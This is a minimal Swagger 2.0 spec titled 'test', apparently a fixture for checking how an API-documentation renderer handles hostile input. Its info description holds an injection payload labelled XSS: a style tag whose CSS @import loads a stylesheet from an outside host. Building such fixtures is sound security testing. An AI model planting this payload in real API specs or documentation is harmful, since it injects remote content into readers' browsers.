swagger: '2.0'
info:
  description: "XSS"<style>@import url('//mymessage-corp.apple.com/start?');</style>
  version: 1.0.0
  title: test
produces:
  - application/json
consumes:
  - application/json
paths:
  /:
    get:
      description: D
      responses:
        '200':
          description: E
          schema:
            $ref: '#/definitions/d'
definitions:
  d:
    type: object
    description: F
    properties:
      id:
        type: integer
        format: int64
